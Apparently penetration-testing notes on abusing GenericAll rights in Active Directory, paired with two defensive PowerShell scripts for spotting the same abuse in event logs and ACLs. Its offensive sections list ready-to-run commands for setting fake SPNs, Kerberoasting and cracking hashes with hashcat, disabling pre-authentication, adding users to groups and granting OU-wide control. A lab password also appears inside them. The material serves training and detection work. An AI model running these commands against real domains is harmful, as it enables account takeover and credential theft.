GenericAll
Over a User
Targeted Kerberoasting
targetedKerberoast extracts Kerberoast hashes by abusing write access to set temporary SPNs on users without one, then removes them. It works on all users, a list, or a single user:

targetedKerberoast.py -v -d '<domain>' -u '<user>' -p '<pass>' --request-user '<target-account>'

When a group/user has GenericAll rights over another account, a fake SPN can be assigned to the target account:
# Credentialed object for the currently owned user
> $SecPass = ConvertTo-SecureString "<password>" -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", $SecPass)
# Create a fake SPN for the target user
> Set-ADUser -Identity "<target-user>" -Credential $Cred -Add @{ServicePrincipalName='fake/http'}

Once the SPN is assigned to the target account, we can Kerberoast it and crack its hash:
# Kerberoast the target account
impacket-GetUserSPNs <domain>\<username>:<password> -request-user <target-user> -dc-ip <dc-ip>
# Crack the hash
hashcat -m13100 fake_spn_hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Targeted ASREPRoasting
We can disable pre-authentication for the target account and then ASREPRoast it:

# Set the DONT_REQ_PREAUTH flag (0x400000 = 4194304) on userAccountControl with PowerView
Set-DomainObject -Identity <USER> -XOR @{UserAccountControl=4194304}

# Same thing with the AD module
Get-ADUser <USER> | Set-ADAccountControl -doesnotrequirepreauth $true

# Confirm that it worked
Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true'

An example of the above method can be found here.
Change user's password
See here.
Over a Group
Add User to the Group
This can be done using native commands, the AD PS module, or PowerView.
PowerView (powerview.py)
# connect to the DC
powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb -k
# add user to the group
PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
# confirm group membership
PV > Get-DomainGroupMember -Identity servicemgmt

AD module / PowerView
# Adding user to the group (AD module)
Add-ADGroupMember -Identity '<GROUP>' -Members <USER>
# Adding user to the group (PowerView, using another user's creds)
Add-DomainGroupMember -Identity 'Core Staff' -Members 'jdgodd' -Credential $Cred -Verbose
# Confirming group membership (PowerView)
Get-DomainGroupMember -Identity '<GROUP>'

Native
# add user to the group
net group <GROUP> <USER> /add /domain
# confirm group membership
net group <GROUP> /domain
# Clean up by removing the account from the group
net group <GROUP> <USER> /del /domain
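From the defender's side, every step in the two sections above leaves a Security-log trace on the domain controller: the temporary SPN and the userAccountControl change are directory object modifications (event 5136), and the group membership change is a group management event (4728/4732/4756). The script below is an added example, not part of the original notes or of any of the tools they mention. It assumes it is run on a DC where "Audit Directory Service Changes" and "Audit Security Group Management" are enabled and a SACL on the domain naming context audits Write Property (without that, 5136 is never written); the $Hours window and the column names are my own choices.

```powershell
# Added example (not from the original notes): triage recent Security-log events
# that correspond to the abuses above and print who changed what.
param([int]$Hours = 24)   # look-back window; assumption, adjust as needed

$since = (Get-Date).AddHours(-$Hours)

# Helper: turn the EventData section of a Security event into a hashtable keyed by field name
function ConvertFrom-EventData {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml = [xml]$Event.ToXml()
    $h = @{}
    foreach ($d in $xml.Event.EventData.Data) { $h[$d.Name] = $d.'#text' }
    return $h
}

# 5136 = directory object modified. The two attributes written by the techniques above.
$watched = @('servicePrincipalName', 'userAccountControl')
$DONT_REQ_PREAUTH = 0x400000

"== Attribute changes (5136) since $since =="
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=5136; StartTime=$since} -ErrorAction SilentlyContinue |
    ForEach-Object {
        $e = ConvertFrom-EventData $_
        if ($watched -contains $e.AttributeLDAPDisplayName) {
            # OperationType: %%14674 = value added, %%14675 = value deleted
            $op = switch ($e.OperationType) { '%%14674' { 'ADD' } '%%14675' { 'DEL' } default { $e.OperationType } }
            # For userAccountControl the value is the new decimal flag set; test the pre-auth bit
            $preauthOff = $null
            if ($e.AttributeLDAPDisplayName -eq 'userAccountControl' -and $e.AttributeValue -match '^\d+$') {
                $preauthOff = [bool]([int]$e.AttributeValue -band $DONT_REQ_PREAUTH)
            }
            [pscustomobject]@{
                Time       = $_.TimeCreated
                Actor      = "$($e.SubjectDomainName)\$($e.SubjectUserName)"
                Object     = $e.ObjectDN
                Attribute  = $e.AttributeLDAPDisplayName
                Op         = $op
                Value      = $e.AttributeValue
                PreauthOff = $preauthOff
            }
        }
    } | Sort-Object Object, Time | Format-Table -AutoSize

# 4728 / 4732 / 4756 = member added to a security-enabled global / domain-local / universal group
"== Group membership additions since $since =="
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4728,4732,4756; StartTime=$since} -ErrorAction SilentlyContinue |
    ForEach-Object {
        $e = ConvertFrom-EventData $_
        [pscustomobject]@{
            Time   = $_.TimeCreated
            Actor  = "$($e.SubjectDomainName)\$($e.SubjectUserName)"
            Group  = $e.TargetUserName
            Member = $e.MemberName
        }
    } | Format-Table -AutoSize
```

Two patterns in the first table are worth alerting on rather than just reviewing: a servicePrincipalName ADD followed within minutes by a DEL of the same value on the same object (the "set temporary SPN, request ticket, remove it" behaviour the targetedKerberoast description above spells out), and any userAccountControl change where PreauthOff flips to True on an account that did not have it set before. The Actor column is the subject that performed the write, which is the owned account in the scenarios above, so a low-privileged user writing to another user's SPN or UAC is the thing to chase.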
If a group has GenericAll rights over an OU, a member of that group can add an inheritable GenericAll ACE for themselves on the OU; the ACE propagates to the OU's child objects, which results in FullControl over the OU members. This gives the ability to change any OU user's password.
# give oorend GenericAll rights over the Service Users OU
bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
# confirm FullControl over OU members (winrm_svc)
powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb -k
PV > Get-DomainObjectAcl -Identity winrm_svc -Where "SecurityIdentifier contains oorend"
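The three sections above (user, group, OU) all start from the same misconfiguration: a GenericAll ACE held by a principal that should not have it. The audit below is an added example, not code from the original notes or from PowerView/bloodyAD; it generalizes the single Get-DomainObjectAcl check above to every user, group and OU in the domain. It assumes the ActiveDirectory module (RSAT) is available so that the AD: drive exists, and the $expected list of trustees that legitimately hold GenericAll is an assumption to be adjusted for the environment (tiered admin groups, delegation accounts).

```powershell
# Added example (not from the original notes): list Allow GenericAll ACEs on users,
# groups and OUs whose trustee is outside the expected administrative set.
Import-Module ActiveDirectory

# Trustees that normally hold GenericAll. Assumption: extend for the environment.
$expected = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    '*\Domain Admins',
    '*\Enterprise Admins'
)

function Get-UnexpectedGenericAll {
    param([string]$DistinguishedName)
    $acl = Get-Acl -Path "AD:\$DistinguishedName"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # GenericAll is a composite right; HasFlag checks that the whole mask is present
        if (-not $ace.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll)) { continue }
        $id = $ace.IdentityReference.Value
        $known = $false
        foreach ($pattern in $expected) { if ($id -like $pattern) { $known = $true; break } }
        if ($known) { continue }
        [pscustomobject]@{
            Object    = $DistinguishedName
            Trustee   = $id
            Inherited = $ace.IsInherited
            # On an OU, 'All' or 'Descendents' means the ACE flows down to the child objects,
            # which is exactly the propagation the OU section above relies on
            AppliesTo = $ace.InheritanceType
        }
    }
}

# Walk the three object classes covered above; use -SearchBase to scope this in a large domain
$targets  = @(Get-ADOrganizationalUnit -Filter * | Select-Object -ExpandProperty DistinguishedName)
$targets += Get-ADGroup -Filter * | Select-Object -ExpandProperty DistinguishedName
$targets += Get-ADUser  -Filter * | Select-Object -ExpandProperty DistinguishedName

$targets | ForEach-Object { Get-UnexpectedGenericAll -DistinguishedName $_ } | Format-Table -AutoSize
```

Rows where Inherited is False are the ACEs somebody set directly on that object and are the first to explain; a non-inherited GenericAll on an OU with AppliesTo of All or Descendents is the exact state the bloodyAD command above produces. Run the audit once to establish a baseline and diff subsequent runs against it rather than reading the full list each time.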